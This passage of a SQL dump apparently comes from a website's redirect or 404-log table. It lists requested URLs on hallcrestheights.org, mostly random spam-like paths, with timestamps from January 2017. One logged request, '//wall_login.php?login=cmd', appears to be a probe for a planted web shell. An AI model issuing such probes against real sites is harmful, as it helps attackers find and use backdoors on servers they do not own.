00:00:00'),(4952,'http://www.hallcrestheights.org/yembjvht-qqdc/i20162630-kzfltzt-k48851-erqbwnsw/',NULL,'','',1,0,'2017-01-14 01:49:33','0000-00-00 00:00:00'),(4953,'http://www.hallcrestheights.org/xhajv-qlwczb/k53107-iqsos-qxoq-i20162634-kgqaqyd/',NULL,'','',1,0,'2017-01-14 01:53:20','0000-00-00 00:00:00'),(4954,'http://www.hallcrestheights.org/wbwpbo-nkydhxjj/ikvf-i20162628-vtzpx-k48499-bxkc/',NULL,'','',1,0,'2017-01-14 02:00:54','0000-00-00 00:00:00'),(4955,'http://www.hallcrestheights.org/xhajvq-lwczbiqs/osqx-i20162633-oqkgq-k17539-aqyd/',NULL,'','',1,0,'2017-01-14 02:04:41','0000-00-00 00:00:00'),(4956,'http://www.hallcrestheights.org/yembjvh-i20162631-tqqdc/kzfltz-k6523-terqbw-nswns/',NULL,'','',1,0,'2017-01-14 02:12:15','0000-00-00 00:00:00'),(4957,'http://www.hallcrestheights.org/ajqxxuc-i20162631-uzaof/ifephi-k7423-ijimjn-jbogt/',NULL,'','',1,0,'2017-01-14 02:16:02','0000-00-00 00:00:00'),(4958,'http://www.hallcrestheights.org/i20162630-soegszx-yifet/vtndyu-k55123-uhvfcy-zlsxx/',NULL,'','',1,0,'2017-01-14 02:23:36','0000-00-00 00:00:00'),(4959,'http://www.hallcrestheights.org/i20162630-bsoapaz-apsta/sgmhcq-k36223-cmckfr-dtfkg/',NULL,'','',1,0,'2017-01-14 02:27:23','0000-00-00 00:00:00'),(4960,'http://www.hallcrestheights.org/i20162630-kzpffms-xklrd/edhwge-k34423-fvbbgz-agpec/',NULL,'','',1,0,'2017-01-14 02:31:10','0000-00-00 00:00:00'),(4961,'http://www.hallcrestheights.org/xhajvql-wczbi/qsosqx-i20162631-oqkgqa-qydcp-k5423-tznz/',NULL,'','',1,0,'2017-01-14 02:34:57','0000-00-00 00:00:00'),(4962,'http://www.hallcrestheights.org/cwhriwg-pekzq/i20162630-dwkvum-zbsaii-mjzfo-k57623-zgdv/',NULL,'','',1,0,'2017-01-14 02:38:44','0000-00-00 00:00:00'),(4963,'http://www.hallcrestheights.org/htxwhyk-rsvsv/i20162630-hudykb-qxdosf-ietyu-k54923-aixn/',NULL,'','',1,0,'2017-01-14 02:42:31','0000-00-00 00:00:00'),(4964,'http://www.hallcrestheights.org/ajqxxucu-k7891-zaof/ifephii-i20162633-jimjnjbo-gtsakbcc/',NULL,'','',1,0,'2017-01-14 02:46:18','0000-00-00 00:00:00'),(4965,'http://www.hallcrestheights.org/ajqxxuc-uzaof/i20162630-ifephi-ijimjn-jbogt-k36023-sakb/',NULL,'','',1,0,'2017-01-14 02:53:52','0000-00-00 00:00:00'),(4966,'http://www.hallcrestheights.org/i20162628-tkuykf-jdnjjbuc/yupa-jaylr-lwfv-k48299-dyruqpk/',NULL,'','',1,0,'2017-01-14 02:57:39','0000-00-00 00:00:00'),(4967,'http://www.hallcrestheights.org/yembjv-i20162629-htqqdckz/fltz-terqb-wnsw-k26699-nsnjplp/',NULL,'','',1,0,'2017-01-14 03:01:26','0000-00-00 00:00:00'),(4968,'http://www.hallcrestheights.org/tkuykf-jdnjjbuc/yupa-jaylr-i20162632-lwfv-k38939-dyruqpk/',NULL,'','',1,0,'2017-01-14 03:05:13','0000-00-00 00:00:00'),(4969,'http://www.hallcrestheights.org/i20162634-nfrko-pdobbu/mgolz-esrk-wtzqtqb-k32207-svjcwjbx/',NULL,'','',1,0,'2017-01-14 03:12:47','0000-00-00 00:00:00'),(4970,'http://www.hallcrestheights.org/i20162634-htxwhykr-svsv/hudykbq-xdosfiet-yuaixnrb-k34331-dggs/',NULL,'','',1,0,'2017-01-14 03:16:36','0000-00-00 00:00:00'),(4971,'http://www.hallcrestheights.org/wbwpbonk-ydhx/i20162630-jjikvfv-tzpxbxkc-wjybtylw-k48551-osdu/',NULL,'','',1,0,'2017-01-14 03:20:21','0000-00-00 00:00:00'),(4972,'http://www.hallcrestheights.org/i20162634-bsoapaza-psta/sgmhcqc-mckfrdtf-kgpvbchs-k55931-iwho/',NULL,'','',1,0,'2017-01-14 03:24:40','0000-00-00 00:00:00'),(4973,'http://www.hallcrestheights.org/nfrkopd-obbum-golzes/k5323-rkwtzq-tqbsv-jcwj-i20162631-bxnmyv/',NULL,'','',1,0,'2017-01-14 03:27:57','0000-00-00 00:00:00'),(4974,'http://www.hallcrestheights.org/k6223-wbwpbon-kydhx-jjikvf/vtzpxb-xkcwj-ybty-i20162631-lwosdu/',NULL,'','',1,0,'2017-01-14 03:31:42','0000-00-00 00:00:00'),(4975,'http://www.hallcrestheights.org/htxwhyk-rsvsv-hudykb/qxdosf-k57523-ietyu-i20162630-aixn-rbdggs/',NULL,'','',1,0,'2017-01-14 03:35:29','0000-00-00 00:00:00'),(4976,'http://www.hallcrestheights.org/xhajvql-wczbi-qsosqx/oqkgqa-qydcp-i20162630-tznz-k54823-vtjqoe/',NULL,'','',1,0,'2017-01-14 03:39:16','0000-00-00 00:00:00'),(4977,'http://www.hallcrestheights.org/tkuykfj-dnjjb-ucyupa/jaylrl-wfvdy-i20162630-ruqp-k35923-klsdef/',NULL,'','',1,0,'2017-01-14 03:43:03','0000-00-00 00:00:00'),(4978,'http://www.hallcrestheights.org/yembjv-htqqdckz-fltz/terqb-i20162629-wnsw-k5899-nsnjplp-ftrrjnc/',NULL,'','',1,0,'2017-01-14 03:46:51','0000-00-00 00:00:00'),(4979,'http://www.hallcrestheights.org/tkuykf-jdnjjbuc-yupa/jaylr-i20162629-k4099-lwfv-dyruqpk-lsdefhx/',NULL,'','',1,0,'2017-01-14 03:50:37','0000-00-00 00:00:00'),(4980,'http://www.hallcrestheights.org/tkuykf-i20162633-jdnjjbuc-k18139-yupa/jaylr-lwfv-dyruqpk-lsdefhx/',NULL,'','',1,0,'2017-01-14 03:54:24','0000-00-00 00:00:00'),(4981,'http://www.hallcrestheights.org/i20162632-oiyizg-olrcmwfb-snop/k38839-dgfnh-skrl-jrgfctf-zfiwxwm/',NULL,'','',1,0,'2017-01-14 03:58:11','0000-00-00 00:00:00'),(4982,'http://www.hallcrestheights.org/kzpffmsx-i20162633-klrd-edhwgef/k7591-vbbgzagp-eciyyuwu-vfzt-jigj/',NULL,'','',1,0,'2017-01-14 04:01:57','0000-00-00 00:00:00'),(4983,'http://www.hallcrestheights.org/soegszxy-i20162633-ifet-vtndyuu/hvfcyzls-k28291-xxqroxae-hksk-xyxe/',NULL,'','',1,0,'2017-01-14 04:05:45','0000-00-00 00:00:00'),(4984,'http://www.hallcrestheights.org/k54607-cwhri-wgpekz-i20162634-qdwkv/umzb-saiimjz-fozgdvdd-qjvdobkn/',NULL,'','',1,0,'2017-01-14 04:09:32','0000-00-00 00:00:00'),(4985,'http://www.hallcrestheights.org/kzpff-msxklr-dedhw/i20162635-gefv-bbgzagp-k13207-eciyyuwu-vfztjigj/',NULL,'','',1,0,'2017-01-14 04:13:19','0000-00-00 00:00:00'),(4986,'http://www.hallcrestheights.org/i20162628-fadlajfn-lgfpc/k18590-vwgmyhde-cwxbdeu-dkov-fiibp.htm',NULL,'','',2,0,'2017-01-14 04:54:56','0000-00-00 00:00:00'),(4987,'http://www.hallcrestheights.org/ryvh-rhmqtyy-i20162634-k562-sllge/ajanpd-mefnxhq-fhjdyhao-xrcjhwu.htm',NULL,'','',1,0,'2017-01-14 05:01:49','0000-00-00 00:00:00'),(4988,'http://www.hallcrestheights.org/cwhri-wgpekz-qdwkv-umzb-saiimjz-k14177-fozgdvdd-qjvdobkn-i20162635-lykcone-dwjmaxev-ortbz-qsax-idihgn/',NULL,'','',1,0,'2017-01-14 05:02:58','0000-00-00 00:00:00'),(4989,'http://www.hallcrestheights.org/i20162632-zmkuedtz-jivyo-qxifgxuh/xptvuhm-k36670-iwnz-korpv-ubfgnq.htm',NULL,'','',1,0,'2017-01-14 05:11:28','0000-00-00 00:00:00'),(4990,'http://www.hallcrestheights.org/i20162632-dvisciwb-vwkux-k15570-krbzomsm/vuclzup-hvqa-wuoxz-mnpzvs-gcrl.htm',NULL,'','',1,0,'2017-01-14 05:14:41','0000-00-00 00:00:00'),(4991,'http://www.hallcrestheights.org/vqjnysp-i20162633-vholjpeu-k378-rrtpiluo/urxivlb-trhnnm-tqzko-wtsxppbg-rrcd.htm',NULL,'','',1,0,'2017-01-14 05:17:55','0000-00-00 00:00:00'),(4992,'http://www.hallcrestheights.org/gnfz-k1162-nxvjxpa-ltitj-shkyjy/ldpijaa-mdurtaen-i20162634-pggwtdv-lxtdqkun-fglq.htm',NULL,'','',1,0,'2017-01-14 05:24:19','0000-00-00 00:00:00'),(4993,'http://www.hallcrestheights.org/k25350-fadlajfn-lgfpc-vwgmyhde-cwxbdeu/dkov-i20162635-fiibp-tquhzx-chhr-mxagfpap-uhgfqvjd.htm',NULL,'','',1,0,'2017-01-14 05:27:32','0000-00-00 00:00:00'),(4994,'http://www.hallcrestheights.org/ixnmuea-hwhiozhj-i20162632-xbnwpgey-ooayiku/ksszqc-ebaqd-omytniho-lbde-k42378-ntafym-luze.htm',NULL,'','',1,0,'2017-01-14 05:30:46','0000-00-00 00:00:00'),(4995,'http://www.hallcrestheights.org/vqjnyspv-holjp-eurrtpil-uourxiv/lbtr-hnnmt-i20162632-k36570-qzkowt-sxpp-bgrrcdsi-kibkxnpf-ovpyay.htm',NULL,'','',1,0,'2017-01-14 05:33:58','0000-00-00 00:00:00'),(4996,'http://www.hallcrestheights.org/k462-lugd-ltrsmxx-hypzq-jllzoh/njumnte-cwfogywb-iwyrurf-gvfcwqzh-i20162634-ribn-knyfeebs-bjhfkwet.htm',NULL,'','',2,0,'2017-01-14 05:37:12','0000-00-00 00:00:00'),(4997,'http://www.hallcrestheights.org/gnfznxvj-xpalt-k36470-itjshkyj-yldpija/i20162632-amdu-rtaen-pggwtd-vlxt-dqkunfgl-qrhzyonx-feqnzs-vvbpzw.htm',NULL,'','',1,0,'2017-01-14 05:40:24','0000-00-00 00:00:00'),(4998,'http://www.hallcrestheights.org//wall_login.php?login=cmd',NULL,'','',1,0,'2017-01-14 05:42:19','0000-00-00 00:00:00'),(4999,'http://www.hallcrestheights.org/mrcqgbei-fuwgr-k25850-abtnwyrq-semgwko/whme-mxgku-cybnpz-i20162635-kicv-ejxkulzj-cjkntsxj-lnuuuv-tffcgy.htm',NULL,'','',1,0,'2017-01-14 05:43:38','0000-00-00 00:00:00'),(5000,'http://www.hallcrestheights.org/soegszx-yifet/vtndyu-i20162631-uhvfcy-zlsxx-k60323-qrox/',NULL,'','',1,0,'2017-01-14 05:50:04','0000-00-00 00:00:00'),(5001,'http://www.hallcrestheights.org/bsoapa-zapstasg-mhcq/i20162628-k58999-cmckf-rdtf-kgpvbch-siwhork/',NULL,'','',1,0,'2017-01-14 05:53:27','0000-00-00 00:00:00'),(5002,'http://www.hallcrestheights.org/xhajv-qlwczb-iqsos/i20162635-qxoq-kgqaqyd-cptznzvt-k2407-jqoevpca/',NULL,'','',1,0,'2017-01-14 05:56:30','0000-00-00 00:00:00'),(5003,'http://www.hallcrestheights.org/yembj-k43807-vhtqqd-i20162634-ckzfl/tzte-rqbwnsw-nsnjplpf-trrjncyp/',NULL,'','',1,0,'2017-01-14 05:59:43','0000-00-00 00:00:00'),(5004,'http://www.hallcrestheights.org/i20162632-oiyizg-olrcmwfb-snop/dgfnh-skrl-jrgfctf-zfiwxwm-k49239-akoay/',NULL,'','',1,0,'2017-01-14 06:02:56','0000-00-00 00:00:00'),(5005,'http://www.hallcrestheights.org/ajqxx-ucuzao-i20162634-fifep/hiij-imjnjbo-gtsakbcc-gyfmdvju-k43407-xzlekts/',NULL,'','',1,0,'2017-01-14 06:06:09','0000-00-00 00:00:00'),(5006,'http://www.hallcrestheights.org/i20162630-soegszx-yifet-vtndyu-k46023-uhvfcy/zlsxx-qrox-aehksk-xyxemb-uqudtwq-ceyvu/',NULL,'','',1,0,'2017-01-14 06:09:22','0000-00-00 00:00:00'),(5007,'http://www.hallcrestheights.org/wbwpb-k43507-onkydh-xjjik-vfvt/zpxbxkc-wjybtylw-i20162634-osduieqg-wsogxhg-pisdhtni/',NULL,'','',1,0,'2017-01-14 06:12:35','0000-00-00 00:00:00'),(5008,'http://www.hallcrestheights.org/i20162630-ajqxxuc-uzaof-ifephi-k45123-ijimjn/jbogt-sakb-ccgyfm-dvjuxz-lektsls-hxosq/',NULL,'','',1,0,'2017-01-14 06:15:48','0000-00-00 00:00:00'),(5009,'http://www.hallcrestheights.org/xhajv-qlwczb-iqsos-qxoq/i20162634-kgqaqyd-cptznzvt-jqoevpca-k44007-qwjaluw-tybckbsx-bnbgn/',NULL,'','',1,0,'2017-01-14 06:19:02','0000-00-00 00:00:00'),(5010,'http://www.hallcrestheights.org/cwhri-wgpekz-qdwkv-umzb/saiimjz-fozgdvdd-qjvdobkn-i20162635-lykcone-dwjmaxev-ortbz-qsax-k1307-idihgn/',NULL,'','',1,0,'2017-01-14 06:25:27','0000-00-00 00:00:00'),(5011,'http://www.hallcrestheights.org/bsoap-azapst-asgmh-cqcm/ckfrdtf-kgpvbchs-i20162634-iwhorklv-zrtjrsy-oaayfwgd-xskmy-ukcm-k43607-bqrmkr/',NULL,'','',1,0,'2017-01-14 06:28:39','0000-00-00 00:00:00'),(5012,'http://www.hallcrestheights.org/xhajv-qlwczb-iqsos-qxoq/kgqaqyd-cptznzvt-i20162634-jqoevpca-qwjaluw-tybckbsx-bnbgn-ndor-k42707-cajppe/',NULL,'','',1,0,'2017-01-14 06:31:52','0000-00-00 00:00:00'),(5013,'http://www.hallcrestheights.org/i20162632-gnfzn-xvjx/k48014-palt-itjshkyj.htm',NULL,'','',1,0,'2017-01-14 06:35:06','0000-00-00 00:00:00'),(5014,'http://www.hallcrestheights.org/i20162632-pcscq-rufu/k32534-npkw-xpoideot.htm',NULL,'','',1,0,'2017-01-14 06:41:31','0000-00-00 00:00:00'),(5015,'http://www.hallcrestheights.org/i20162632-ryvhrhmq-tyysl/k4670-lgeajanp-dmefnxh.htm',NULL,'','',1,0,'2017-01-14 06:44:44','0000-00-00 00:00:00'),(5016,'http://www.hallcrestheights.org/i20162632-ixnmueah-whioz/k46070-hjxbnwpg-eyooayi.htm',NULL,'','',1,0,'2017-01-14 06:47:57','0000-00-00 00:00:00'),(5017,'http://www.hallcrestheights.org/fadlaj-k51766-fnlgfp/cvwgmy-hdec-i20162634-wxbdeu.htm',NULL,'','',1,0,'2017-01-14 06:51:10','0000-00-00 00:00:00'),(5018,'http://www.hallcrestheights.org/gnfznx-k54826-vjxpal/i20162637-titjsh-kyjy-ldpija.htm',NULL,'','',1,0,'2017-01-14 06:54:24','0000-00-00 00:00:00'),(5019,'http://www.hallcrestheights.org/vqjnysp-vholjpeu/i20162630-k59138-rrtpiluo-urxivlb.htm',NULL,'','',1,0,'2017-01-14 06:57:37','0000-00-00 00:00:00'),(5020,'http://www.hallcrestheights.org/k5470-zmkuedtz-jivyo/i20162632-qxifgxuh-xptvuhm-iwnz.htm',NULL,'','',1,0,'2017-01-14 07:00:50','0000-00-00 00:00:00'),(5021,'http://www.hallcrestheights.org/i20162635-k37150-dvisciwb-vwkux/krbzomsm-vuclzup-hvqa.htm',NULL,'','',3,0,'2017-01-14 07:10:29','0000-00-00 00:00:00'),(5022,'http://www.hallcrestheights.org/fadla-jfnl/k10634-gfpc-vwgmyhde-cwxbdeud-i20162633-kovfii.htm',NULL,'','',1,0,'2017-01-14 07:13:42','0000-00-00 00:00:00'),(5023,'http://www.hallcrestheights.org/edzvdlqc-omnnm/k4370-mcawvbfu-japyvrl-i20162632-flxh-qjkuh.htm',NULL,'','',1,0,'2017-01-14 07:16:54','0000-00-00 00:00:00'),(5024,'http://www.hallcrestheights.org/i20162632-edzvd-lqco-mnnm/mcawvbfu-japyvrlf-k52834-lxhqjk-uhkcm.htm',NULL,'','',1,0,'2017-01-14 07:20:08','0000-00-00 00:00:00'),(5025,'http://www.hallcrestheights.org/pcscqru-funpkwxp/k32378-oideotwt-vsoarmo-i20162632-smgepl-alhel.htm',NULL,'','',1,0,'2017-01-14 07:26:34','0000-00-00 00:00:00'),(5026,'http://www.hallcrestheights.org/dvisciwb-vwkux-krbzomsm/vuclzup-hvqa-wuoxz-i20162631-k40270-mnpzvs.htm',NULL,'','',1,0,'2017-01-14 07:29:47','0000-00-00 00:00:00'),(5027,'http://www.hallcrestheights.org/jgletkym-drqzn-i20162634-rvmlkswa/k57550-zvkecqq-neei-aqjzl-nplqfc.htm',NULL,'','',1,0,'2017-01-14 07:36:13','0000-00-00 00:00:00'),(5028,'http://www.hallcrestheights.org/vqjn-i20162633-yspvhol-jpeur/rtpilu-k54562-ourxivl-btrhnnmt-qzkowts.htm',NULL,'','',1,0,'2017-01-14 07:39:25','0000-00-00 00:00:00'),(5029,'http://www.hallcrestheights.org/ryvhrhmq-tyysl-k9090-lgeajanp/dmefnxh-i20162628-qfhj-dyhao-xrcjhw-uvds.htm',NULL,'','',1,0,'2017-01-14 07:42:38','0000-00-00 00:00:00'),(5030,'http://www.hallcrestheights.org/dvisciwb-vwkux-k38970-krbzomsm/vuclzup-hvqa-wuoxz-mnpzvs-i20162631-gcrl.htm',NULL,'','',1,0,'2017-01-14 07:45:53','0000-00-00 00:00:00'),(5031,'http://www.hallcrestheights.org/i20162632-mrcqgbei-fuwgr-k26370-abtnwyrq/semgwko-whme-mxgku-cybnpz-kicv.htm',NULL,'','',1,0,'2017-01-14 07:49:05','0000-00-00 00:00:00'),(5032,'http://www.hallcrestheights.org/fadla-k49114-jfnl-gfpc-vwgmyhde/i20162632-cwxbdeud-kovfii-bptqu-hzxchh-rmxag.htm',NULL,'','',1,0,'2017-01-14 07:52:17','0000-00-00 00:00:00'),(5033,'http://www.hallcrestheights.org/dvisc-k12034-iwbv-wkux-krbzomsm/vuclzuph-i20162633-vqawuo-xzmnp-zvsgcr-lycmc.htm',NULL,'','',1,0,'2017-01-14 07:55:31','0000-00-00 00:00:00'),(5034,'http://www.hallcrestheights.org/uptt-i20162633-mnbeatg-k54162-rbnqc/dcncxr-dhcpgzz-dllimvyx-jltfeob-kebwivsm.htm',NULL,'','',1,0,'2017-01-14 07:58:44','0000-00-00 00:00:00'),(5035,'http://www.hallcrestheights.org/jgletkym-k25570-drqzn-rvmlkswa-zvkecqq/i20162632-neei-aqjzl-nplqfc-nebx-ilnvoxbd.htm',NULL,'','',1,0,'2017-01-14 08:01:56','0000-00-00 00:00:00'),(5036,'http://www.hallcrestheights.org/gnfznxvj-k39070-xpalt-itjshkyj-i20162631-yldpija/amdu-rtaen-pggwtd-vlxt-dqkunfgl.htm',NULL,'','',1,0,'2017-01-14 08:05:10','0000-00-00 00:00:00'),(5037,'http://www.hallcrestheights.org/k4470-ixnmueah-whioz-i20162632-hjxbnwpg-eyooayi/kuks-szqce-baqdom-ytni-holbdent-afymluze.htm',NULL,'','',1,0,'2017-01-14 08:08:23','0000-00-00 00:00:00'),(5038,'http://www.hallcrestheights.org/k36150-zmkuedtz-jivyo-qxifgxuh-xptvuhm/iwnz-i20162635-korpv-ubfgnq-tpmh-prbikzon-mtlajhol.htm',NULL,'','',1,0,'2017-01-14 08:11:36','0000-00-00 00:00:00'),(5039,'http://www.hallcrestheights.org/k37950-ryvhrhmq-tyysl-lgeajanp-dmefnxh/qfhj-i20162635-dyhao-xrcjhw-uvds-vezytwlc-ycwscpua.htm',NULL,'','',1,0,'2017-01-14 08:18:01','0000-00-00 00:00:00'),(5040,'http://www.hallcrestheights.org/k51090-fadlajfn-lgfpc-vwgmyhde-cwxbdeu/dkov-fiibp-tquhzx-i20162637-chhr-mxagfpap-uhgfqvjd.htm',NULL,'','',1,0,'2017-01-14 08:21:15','0000-00-00 00:00:00'),(5041,'http://www.hallcrestheights.org/i20162630-gnfznxv-jxpaltit-jshkyjyl-dpijaam/durtae-npggw-tdvlxtdq-kunf-k38238-glqrhz-yonx.htm',NULL,'','',1,0,'2017-01-14 08:24:27','0000-00-00 00:00:00'),(5042,'http://www.hallcrestheights.org/jgletky-mdrqznrv-mlkswazv-k4458-kecqqne/eiaqjz-lnplq-fcnebxil-nvox-i20162634-bdjvee-bikp-tjvl.htm',NULL,'','',1,0,'2017-01-14 08:27:40','0000-00-00 00:00:00'),(5043,'http://www.hallcrestheights.org/ryvhrhmq-tyysl-lgeajanp-dmefnxh/qfhj-dyhao-i20162632-xrcjhw-uvds-k5970-vezytwlc-ycwscpua-kqnjtn.htm',NULL,'','',1,0,'2017-01-14 08:30:54','0000-00-00 00:00:00'),(5044,'http://www.hallcrestheights.org/edzvdlqc-omnnm-mcawvbfu-japyvrl/flxh-qjkuh-kcmumb-hmgz-k37650-nkoheyru-i20162635-pxpudzik-musshe.htm',NULL,'','',1,0,'2017-01-14 08:34:06','0000-00-00 00:00:00'),(5045,'http://www.hallcrestheights.org/mrcqg-beif-k48314-uwgr-abtnwyrq/i20162632-semgwkow-hmemxg-kucyb-npzkic-vejxk-ulzjcjk-ntsxjln-uuuv.htm',NULL,'','',1,0,'2017-01-14 08:40:32','0000-00-00 00:00:00'),(5046,'http://www.hallcrestheights.org/lugdltr-smxxhypz-k32078-qjllzohn-jumntec/i20162632-wfogyw-biwyr-urfgvfcw-qzhr-ibnkny-feeb-sbjh-fkwet.htm',NULL,'','',1,0,'2017-01-14 08:43:46','0000-00-00 00:00:00'),(5047,'http://www.hallcrestheights.org/wbwpbon-kydhx/jjikvf-i20162631-k7523-vtzpxb/',NULL,'','',1,0,'2017-01-14 08:46:59','0000-00-00 00:00:00'),(5048,'http://www.hallcrestheights.org/vqjnyspv-holjp-k4070-eurrtpil-uourxiv/i20162632-lbtr-hnnmt-qzkowt-sxpp-bgrrcdsi-kibkxnpf-ovpyay-bgoynk.htm',NULL,'','',1,0,'2017-01-14 08:50:11','0000-00-00 00:00:00'),(5049,'http://www.hallcrestheights.org/mrcqgbei-fuwgr-k51590-abtnwyrq-semgwko/whme-mxgku-cybnpz-kicv-ejxkulzj-i20162637-cjkntsxj-lnuuuv-tffcgy.htm',NULL,'','',1,0,'2017-01-14 08:53:25','0000-00-00 00:00:00'),(5050,'http://www.hallcrestheights.org/ryvh-rhmqtyy-k52562-sllge-ajanpd/mefnxhq-i20162633-fhjdyhao-xrcjhwu-vdsvezyt-wlcy-cwscpuak-qnjtnply-jupsujj.htm',NULL,'','',1,0,'2017-01-14 08:56:38','0000-00-00 00:00:00'),(5051,'http://www.hallcrestheights.org/soegsz-xyifetvt/i20162632-ndyu-uhvfc-k60739-yzls/',NULL,'','',1,0,'2017-01-14 08:59:50','0000-00-00 00:00:00'),(5052,'http://www.hallcrestheights.org/oiyizg-olrcmwfb/snop-i20162633-dgfnh-k19339-skrl/',NULL,'','',1,0,'2017-01-14 09:03:04','0000-00-00 00:00:00'),(5053,'http://www.hallcrestheights.org/i20162630-k17395-qlbo-wciggec/eayafxr-glnik-ghhmb/',NULL,'','',1,0,'2017-01-14 09:06:16','0000-00-00 00:00:00'),(5054,'http://www.hallcrestheights.org/oiyizgo-lrcmw/fbsnop-i20162631-dgfnhs-krljr-k7223-gfct/',NULL,'','',1,0,'2017-01-14 09:09:29','0000-00-00 00:00:00'),(5055,'http://www.hallcrestheights.org/tkuykf-i20162629-jdnjjbuc/yupa-jaylr-lwfv-k24899-dyruqpk/',NULL,'','',1,0,'2017-01-14 09:12:43','0000-00-00 00:00:00'),(5056,'http://www.hallcrestheights.org/i20162634-soegs-zxyife/tvtnd-yuuh-vfcyzls-k54707-xxqroxae/',NULL,'','',1,0,'2017-01-14 09:15:55','0000-00-00 00:00:00'),(5057,'http://www.hallcrestheights.org/yembj-vhtqqd-i20162634-ckzfl/tzte-rqbwnsw-k32107-nsnjplpf-trrjncyp/',NULL,'','',1,0,'2017-01-14 09:19:09','0000-00-00 00:00:00'),(5058,'http://www.hallcrestheights.org/bsoapaz-apsta-sgmhcq/cmckfr-dtfkg-pvbc-hsiwho-i20162631-k7623-rklvzr/',NULL,'','',1,0,'2017-01-14 09:22:22','0000-00-00 00:00:00'),(5059,'http://www.hallcrestheights.org/ajqxxu-cuzaofif-ephi/k5499-ijimj-njbo-i20162629-gtsakbc-cgyfmdv-juxzl/',NULL,'','',1,0,'2017-01-14 09:28:48','0000-00-00 00:00:00'),(5060,'http://www.hallcrestheights.org/qlbowc-iggeceay-afxr/k48699-glnik-i20162628-ghhm-bbxpges-mrcaizt-biauw/',NULL,'','',1,0,'2017-01-14 09:32:01','0000-00-00 00:00:00'),(5061,'http://www.hallcrestheights.org/tkuykf-jdnjjbuc-yupa/jaylr-lwfv-i20162629-dyruqpk-lsdefhx-k26199-dfpdf/',NULL,'','',1,0,'2017-01-14 09:35:14','0000-00-00 00:00:00'),(5062,'http://www.hallcrestheights.org/i20162632-htxwhy-krsvsvhu-dykb/qxdos-fiet-yuaixnr-bdggsaa-k38439-rhefs/',NULL,'','',1,0,'2017-01-14 09:41:40','0000-00-00 00:00:00'),(5063,'http://www.hallcrestheights.org/i20162632-oiyizg-olrcmwfb-snop/k60939-dgfnh-skrl-jrgfctf-zfiwxwm-akoay/',NULL,'','',1,0,'2017-01-14 09:44:53','0000-00-00 00:00:00'),(5064,'http://www.hallcrestheights.org/wbwp-bonkydh-xjjikvf/k16155-vtzpx-bxkcw-i20162629-jybtylw-osdu-ieqgwsog/',NULL,'','',1,0,'2017-01-14 09:48:06','0000-00-00 00:00:00'),(5065,'http://www.hallcrestheights.org/kzpffmsx-klrd-edhwgef/k62451-vbbgzagp-eciyyuwu-vfzt-jigj-i20162631-inamz/',NULL,'','',1,0,'2017-01-14 09:51:18','0000-00-00 00:00:00'),(5066,'http://www.hallcrestheights.org/oiyizgol-rcmw-i20162634-fbsnopd/k34731-gfnhskrl-jrgfctfz-fiwx-wmak-oayos/',NULL,'','',1,0,'2017-01-14 09:54:32','0000-00-00 00:00:00'),(5067,'http://www.hallcrestheights.org/kzpffmsx-klrd-i20162634-edhwgef/vbbgzagp-eciyyuwu-vfzt-jigj-k55431-inamz/',NULL,'','',1,0,'2017-01-14 09:57:45','0000-00-00 00:00:00'),(5068,'http://www.hallcrestheights.org/soegszxy-ifet-vtndyuu/k48051-hvfcyzls-xxqroxae-hksk-i20162630-xyxe-mbuqu/',NULL,'','',1,0,'2017-01-14 10:00:58','0000-00-00 00:00:00'),(5069,'http://www.hallcrestheights.org/cwhri-wgpekz-i20162634-qdwkv/k53307-umzb-saiimjz-fozgdvdd-qjvdobkn-lykcone/',NULL,'','',1,0,'2017-01-14 10:04:11','0000-00-00 00:00:00'),(5070,'http://www.hallcrestheights.org/yembj-vhtqqd-i20162634-ckzfl/tzte-rqbwnsw-nsnjplpf-trrjncyp-k54207-joqwgzj/',NULL,'','',1,0,'2017-01-14 10:07:24','0000-00-00 00:00:00'),(5071,'http://www.hallcrestheights.org/qlbowci-k7723-ggece-ayafxr-i20162631-glnikg/hhmbb-xpge-smrcai-ztbiau-wdtvixp/',NULL,'','',1,0,'2017-01-14 10:10:37','0000-00-00 00:00:00'),(5072,'http://www.hallcrestheights.org/qlbowcig-k8191-gece-ayafxrg-lnikghhm/bbxpgesm-i20162633-rcai-ztbi-auwdt-vixp/',NULL,'','',1,0,'2017-01-14 10:13:50','0000-00-00 00:00:00'),(5073,'http://www.hallcrestheights.org/htxwhykr-k7291-svsv-hudykbq-xdosfiet/yuaixnrb-i20162633-dggs-aarh-efskj-ydmr/',NULL,'','',1,0,'2017-01-14 10:17:02','0000-00-00 00:00:00'),(5074,'http://www.hallcrestheights.org/oiyizgo-k5923-lrcmw-fbsnop-i20162631-dgfnhs/krljr-gfct-fzfiwx-wmakoa-yosmpql/',NULL,'','',1,0,'2017-01-14 10:20:16','0000-00-00 00:00:00'),(5075,'http://www.hallcrestheights.org/nfrkop-k18739-dobbumgo-lzes-rkwtz/qtqb-i20162633-svjcwjb-xnmyvss-sldjz-naahjb/',NULL,'','',1,0,'2017-01-14 10:23:29','0000-00-00 00:00:00'),(5076,'http://www.hallcrestheights.org/kzpffmsx-k48151-klrd-i20162630-edhwgef-vbbgzagp/eciyyuwu-vfzt-jigj-inamz-bcng/',NULL,'','',1,0,'2017-01-14 10:26:41','0000-00-00 00:00:00'),(5077,'http://www.hallcrestheights.org/yembjvh-k57223-tqqdc-i20162630-kzfltz-terqbw/nswns-njpl-pftrrj-ncypjo-qwgzjev/',NULL,'','',1,0,'2017-01-14 10:29:55','0000-00-00 00:00:00'),(5078,'http://www.hallcrestheights.org/cwhriw-k38539-gpekzqdw-kvum-zbsai/i20162632-imjz-fozgdvd-dqjvdob-knlyk-conedw/',NULL,'','',1,0,'2017-01-14 10:33:07','0000-00-00 00:00:00'),(5079,'http://www.hallcrestheights.org/i20162628-tkuykf-k46999-jdnjjbuc-yupa-jaylr/lwfv-dyruqpk-lsdefhx-dfpdf-ufpfaj/',NULL,'','',1,0,'2017-01-14 10:36:20','0000-00-00 00:00:00'),(5080,'http://www.hallcrestheights.org/tkuykfjd-k34831-njjb-ucyupaj-aylrlwfv/dyruqpkl-sdef-i20162634-hxdf-pdfuf-pfaj/',NULL,'','',1,0,'2017-01-14 10:42:47','0000-00-00 00:00:00'),(5081,'http://www.hallcrestheights.org/ajqxxu-i20162629-k26299-cuzaofif-ephi-ijimj/njbo-gtsakbc-cgyfmdv-juxzl-ektsls/',NULL,'','',1,0,'2017-01-14 10:45:59','0000-00-00 00:00:00'),(5082,'http://www.hallcrestheights.org/bsoapaza-k28891-psta-sgmhcqc-mckfrdtf/kgpvbchs-i20162633-iwho-rklv-zrtjr-syoa/',NULL,'','',1,0,'2017-01-14 10:49:12','0000-00-00 